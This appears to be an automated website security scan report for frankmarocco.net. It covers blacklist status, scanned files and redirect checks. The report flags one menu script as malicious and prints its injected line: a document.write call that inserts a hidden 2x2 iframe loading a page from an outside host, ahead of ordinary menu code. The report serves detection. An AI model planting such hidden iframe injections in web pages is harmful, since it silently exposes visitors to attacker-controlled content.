Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frankmarocco.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frankmarocco.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.frankmarocco.net/ | 200 OK Content-Length: 15161 Content-Type: text/html | clean |
http://www.frankmarocco.net/milonic_src.js | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |
http://www.frankmarocco.net/test404page.js | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |
http://www.frankmarocco.net/mmenudom.js | 404 Not Found Content-Length: 411 Content-Type: text/html | clean |
http://www.frankmarocco.net/script/LEFT_MENU0.js | 200 OK Content-Length: 1333 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ptbshop.ionvin.net/eoai.html?j=1338214></iframe>');
_menuCloseDelay=500; _menuOpenDelay=150; _subOffsetTop=2; _subOffsetLeft=-2; buildafterload="true"; with(menuStyle=new mm_style()){ bordercolor="#ffffff"; borderstyle="solid"; borderwidth="1"; fontfamily="Verdana, Tahoma, Arial"; fontsize="10pt"; fon fontsize="9pt"; fontstyle="normal"; offbgcolor="#CC9900"; offcolor="#ffffff"; onbgcolor="#DC9B5B"; oncolor="#ffffff"; padding="4"; separatorcolor="#996600"; separatorsize="1"; subimage="images/black_13x13_greyboxed.gif"; subimagepadding="2"; } with(milonic=new menuname("Main Menu")){ position="relative"; style=menuStyle; alwaysvisible="1"; orientation="vertical"; } drawMenus(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ptbshop.ionvin.net/eoai.html?j=1338214 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ptbshop.ionvin.net/eoai.html?j=1338214> | ||
http://www.frankmarocco.net/preloadmenuimages.js | 404 Not Found Content-Length: 420 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frankmarocco.net
Result:
GET / HTTP/1.1
Host: frankmarocco.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: frankmarocco.net
Referer: http://www.google.com/search?q=frankmarocco.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frankmarocco.net
Referer: http://www.google.com/search?q=frankmarocco.net
Result:
The result is similar to the first query. There are no suspicious redirects found.